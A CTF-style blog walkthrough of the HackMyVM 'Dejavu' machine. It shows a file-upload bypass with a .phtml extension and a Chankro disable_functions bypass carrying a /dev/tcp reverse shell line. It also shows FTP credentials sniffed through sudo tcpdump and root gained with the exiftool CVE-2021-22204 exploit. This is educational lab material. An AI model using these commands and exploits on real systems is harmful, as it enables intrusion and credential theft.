Skip to content
Home » Writeup – HackMyVM’s Dejavu Walkthrough

Writeup – HackMyVM’s Dejavu Walkthrough

  • May 29, 2022
dejavu full walkthrough writeup security hackmyvm

Dejavu is an easy machine from HackMyVM by the user InfayerTS. The machine includes basic vulnerabilities. First of all, we find a path from a page’s source. Then, we have a file upload area that misses an extension to filter out. Similarly, we also have a directory for the uploads. However, there are restrictions to certain functions making it difficult to get a reverse shell. “Writeup – HackMyVM’s Dejavu Walkthrough”

Link to the machine

Step 1: Get the IP address

As always, I started the enumeration by identifying the IP address of the target machine.

❯ sudo netdiscover -r 10.0.0.0/24
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.0.0.1        52:54:00:12:35:00      1      60  Unknown vendor
 10.0.0.2        52:54:00:12:35:00      1      60  Unknown vendor
 10.0.0.3        08:00:27:0e:4f:55      1      60  PCS Systemtechnik GmbH
 10.0.0.152      08:00:27:3b:66:78      1      60  PCS Systemtechnik GmbH

Here, the IP address of the target is 10.0.0.152 whereas that of the attacker is 10.0.0.4 (not shown here).

Step 2: Scan services on the target

Next, I scanned the services on the target that we can access from the network.

❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-28 22:36 +0545
Nmap scan report for 10.0.0.152
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
|   256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_  256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The SSH banner shows that the operating system is Ubuntu 20.04 (Focal) (https://packages.ubuntu.com/focal-updates/ssh). Likewise, we have an HTTP port to enumerate further.

Step 3: Dig into the HTTP webserver

The first page of the server only contains the Apache default server. Thus, I performed directory busting.

❯ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.0.152/ -o common.log
/.hta                 (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 10918]
/info.php             (Status: 200) [Size: 69927]
/server-status        (Status: 403) [Size: 275]

This cursory scan exposed the presence of a PHP info file. In that file, we see that some functions are disabled.

PHP Info shows some functions are restricted

It is essential after some time. However, for now, the source of the page reveals a path.

<html>
<body>
<!-- /S3cR3t -->
</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
<!------------- redacted -------------->

The path “/S3cR3t” has a vulnerability that allows us to explore the directory contents.

Now, the first hurdle is to identify the extension that allows script execution. “.phtml” extension does the job.

Reference: https://book.hacktricks.xyz/pentesting-web/file-upload#file-upload-general-methodology

Since the functions to spawn shells are denied, we cannot directly spawn one. However, there are ways to bypass it. At this point, I am going to use a simple exploit with the tool Chankro. But the problem is that the project is not maintained for long and there is no python3 version of it. Thus,

Reference: https://infosecwriteups.com/how-i-bypassed-disable-functions-in-php-to-get-a-remote-shell-48b827d54979

https://www.tarlogic.com/blog/how-to-bypass-disable_functions-and-open_basedir/

Please check the above links for the details. However, here, we can use the “mail” function because it’s allowed.

The link to the script is: https://github.com/kriss-u/chankro-py3

For the exploit, I created a simple reverse shell file.

bash -c 'bash -i >& /dev/tcp/10.0.0.4/9001 0>&1'

The next stuff is to run the script. But we should notice that the document root is “/var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats”.

Document root
❯ python3 chankro.py --arch 64 --input rev.sh --output shell.phtml --path /var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats/S3cR3t/files/


     -=[ Chankro ]=-
    -={ @TheXC3LL }=-


[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: shell.phtml


[+] File created!

It creates a file that spawns a reverse shell. Here, in my case, it is port 9001.

❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001

That’s all we need. Now, we have to upload the output file and open the link. It gets us a shell.

❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.152.
Ncat: Connection from 10.0.0.152:36554.
bash: cannot set terminal process group (747): Inappropriate ioctl for device
bash: no job control in this shell
<nMostCriticalInternetSecurityThreats/S3cR3t/files$

Lastly, I upgraded this dumb shell to a proper one.

Upgrade to an intelligent reverse shell

Step 4: Sudo abuse tcpdump

Once we get the shell, we have to check the sudo permissions.

www-data@dejavu:/$ sudo -l
Matching Defaults entries for www-data on dejavu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on dejavu:
    (robert) NOPASSWD: /usr/sbin/tcpdump

From the screenshot above, we can say that we can access tcpdump as the user robert. After this, I checked the gtfobins but it didn’t give me any shell at all.

Reference: https://gtfobins.github.io/gtfobins/tcpdump/#sudo

The next thing to do was to listen to the traffic. So, to be certain, I used pspy64 to snoop the processes. Then, I noticed that it would log in to the FTP server every few duration.

2022/05/29 05:48:01 CMD: UID=1000 PID=11992  | /bin/sh -c /home/robert/auth.sh 
2022/05/29 05:48:01 CMD: UID=1000 PID=11994  | ftp -n localhost 
2022/05/29 05:48:01 CMD: UID=1000 PID=11993  | /bin/sh /home/robert/auth.sh 
2022/05/29 05:48:01 CMD: UID=65534 PID=11996  | /usr/sbin/vsftpd /etc/vsftpd.conf 
2022/05/29 05:48:01 CMD: UID=0    PID=11995  | /usr/sbin/vsftpd /etc/vsftpd.conf 

Thus, I knew which port to listen to. Also, we have to listen to the loopback interface. After some time, we get a handshake.

www-data@dejavu:/tmp$ sudo -u robert tcpdump -i lo port ftp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
# Redacted
05:52:01.840340 IP localhost.60932 > localhost.ftp: Flags [P.], seq 1:14, ack 21, win 512, options [nop,nop,TS val 2022967189 ecr 2022967189], length 13: FTP: USER robert
05:52:01.840546 IP localhost.ftp > localhost.60932: Flags [.], ack 14, win 512, options [nop,nop,TS val 2022967190 ecr 2022967189], length 0
05:52:01.841224 IP localhost.ftp > localhost.60932: Flags [P.], seq 21:55, ack 14, win 512, options [nop,nop,TS val 2022967190 ecr 2022967189], length 34: FTP: 331 Please specify the password.
05:52:01.841237 IP localhost.60932 > localhost.ftp: Flags [.], ack 55, win 512, options [nop,nop,TS val 2022967190 ecr 2022967190], length 0
05:52:01.841636 IP localhost.60932 > localhost.ftp: Flags [P.], seq 14:32, ack 55, win 512, options [nop,nop,TS val 2022967191 ecr 2022967190], length 18: FTP: PASS #Password redacted 
05:52:01.842203 IP localhost.ftp > localhost.60932: Flags [.], ack 32, win 512, options [nop,nop,TS val 2022967191 ecr 2022967191], length 0
05:52:01.870378 IP localhost.ftp > localhost.60932: Flags [P.], seq 55:78, ack 32, win 512, options [nop,nop,TS val 2022967219 ecr 2022967191], length 23: FTP: 230 Login successful.
# Redacted everything

The password gives the SSH shell for the user robert.

Escalate to root

The sudo permissions show that the user can execute exiftool as root. As the name suggests, the binary suffers from an exploit with “djvu” modules.

Reference: https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/

Also, the version of the binary is 12.23 and it is vulnerable.

robert@dejavu:/tmp$ exiftool -ver
12.23

The link to the exploits: https://github.com/convisolabs/CVE-2021-22204-exiftool

Cloning into 'CVE-2021-22204-exiftool'...
remote: Enumerating objects: 27, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 27 (delta 6), reused 17 (delta 2), pack-reused 0
Unpacking objects: 100% (27/27), 52.51 KiB | 363.00 KiB/s, done.
robert@dejavu:/tmp$ cd CVE-2021-22204-exiftool/
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ ls
configfile  exploit.py  image.jpg  lab  README.md
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ vim exploit.py 
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ python3 exploit.py 
    1 image files updated
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ ls
configfile  exploit.djvu  exploit.py  image.jpg  image.jpg_original  lab  payload  payload.bzz  README.md
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ sudo exiftool exploit.djvu

The main thing is that we have to update the IP address and the port as desired. This gave us the shell of the root.

❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.152.
Ncat: Connection from 10.0.0.152:60938.
# id
uid=0(root) gid=0(root) groups=0(root)
# 
5 2 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

AdBlock Detected


This website is made possible by displaying online advertisements to the visitors.
Please consider supporting me by disabling your ad blocker.

Refresh